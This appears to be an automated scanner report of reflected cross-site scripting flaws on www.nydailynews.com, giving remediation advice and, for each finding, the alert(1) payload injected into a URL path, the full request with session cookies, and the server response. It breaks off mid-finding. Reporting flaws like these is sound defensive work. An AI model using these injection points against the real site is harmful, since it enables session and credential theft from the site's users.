Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a549f'%3balert(1)//d1c44b68f45 was submitted in the REST URL parameter 1. This input was echoed as a549f';alert(1)//d1c44b68f45 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /a549f'%3balert(1)//d1c44b68f45/index.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:36:57 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70073
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 199a9'%3balert(1)//5fe057c6bfe was submitted in the REST URL parameter 1. This input was echoed as 199a9';alert(1)//5fe057c6bfe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /autos199a9'%3balert(1)//5fe057c6bfe/index.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:36:18 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70078
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae234'%3balert(1)//9537e159f9b was submitted in the REST URL parameter 2. This input was echoed as ae234';alert(1)//9537e159f9b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /autos/index.htmlae234'%3balert(1)//9537e159f9b HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:36:35 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70078
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ecba4'%3balert(1)//eeca0e3c567 was submitted in the REST URL parameter 1. This input was echoed as ecba4';alert(1)//eeca0e3c567 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /classifiedsecba4'%3balert(1)//eeca0e3c567/index.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:36:35 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70084
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2a6a'%3balert(1)//abf1b20a94f was submitted in the REST URL parameter 2. This input was echoed as e2a6a';alert(1)//abf1b20a94f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /classifieds/index.htmle2a6a'%3balert(1)//abf1b20a94f HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:36:55 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70084
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 96572'%3balert(1)//66a9a4c656b was submitted in the REST URL parameter 1. This input was echoed as 96572';alert(1)//66a9a4c656b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /favicon.ico96572'%3balert(1)//66a9a4c656b HTTP/1.1 Host: www.nydailynews.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; sto-id-sg-web-8080=CBACAKAK; Zvents=1djug47bp7; __vrf=3k7r5l65ggtu5gva; sto-id-sg-nydnapp-8080=CBADAKAK; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189499544:ss=1297189499544; zvents_tracker_sid=12971859055740.8106075366958976; __qca=P0-1704281983-1297185912293
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 17:26:18 GMT Server: Apache Keep-Alive: timeout=3, max=998 Connection: Keep-Alive Content-Type: text/html Content-Language: en Vary: Accept-encoding Content-Length: 70202
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4fa49'%3b43b392f6eda was submitted in the REST URL parameter 1. This input was echoed as 4fa49';43b392f6eda in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /favicon.ico965724fa49'%3b43b392f6eda/ HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response (redirected)
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:41:47 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70079
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42b65'%3balert(1)//cc9739daf6a was submitted in the REST URL parameter 1. This input was echoed as 42b65';alert(1)//cc9739daf6a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forums42b65'%3balert(1)//cc9739daf6a/abuse!default.jspa HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:25:43 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70089
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 967e5'%3balert(1)//609b5f09b6 was submitted in the REST URL parameter 1. This input was echoed as 967e5';alert(1)//609b5f09b6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forums967e5'%3balert(1)//609b5f09b6/communityjs/44?forum=13&key=2748c8d6e1b10496a67bf33d97fa3d8e HTTP/1.1 Host: www.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/news/national/2011/02/08/2011-02-08_matthew_hoffman_killer_who_hid_bodies_in_hollowedout_tree_details_crime_in_chill.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; sto-id-sg-web-8080=CBACAKAK; Zvents=1djug47bp7; __vrf=3k7r5l65ggtu5gva; sto-id-sg-nydnapp-8080=CBADAKAK; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189499544:ss=1297189499544; zvents_tracker_sid=12971859055740.8106075366958976; __qca=P0-1704281983-1297185912293
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 17:26:04 GMT Server: Apache Keep-Alive: timeout=3, max=999 Connection: Keep-Alive Content-Type: text/html Content-Language: en Vary: Accept-encoding Content-Length: 70211
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b3a5f'%3balert(1)//87f90d2373b was submitted in the REST URL parameter 1. This input was echoed as b3a5f';alert(1)//87f90d2373b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forumsb3a5f'%3balert(1)//87f90d2373b/forum.jspa HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:24:38 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70092
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 30493'%3balert(1)//8b6d10d85d4 was submitted in the REST URL parameter 1. This input was echoed as 30493';alert(1)//8b6d10d85d4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forums30493'%3balert(1)//8b6d10d85d4/popular-communityjs HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:24:08 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70101
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f2c5b'%3balert(1)//729fb7c0d7b was submitted in the REST URL parameter 1. This input was echoed as f2c5b';alert(1)//729fb7c0d7b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forumsf2c5b'%3balert(1)//729fb7c0d7b/thread.jspa HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:24:58 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70084
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2431'%3bc432a46231f was submitted in the REST URL parameter 1. This input was echoed as e2431';c432a46231f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /gossipe2431'%3bc432a46231f/2011/02/08/ HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response (redirected)
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:25:09 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70084
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce86e'%3b16f413446c was submitted in the REST URL parameter 2. This input was echoed as ce86e';16f413446c in the application's response.
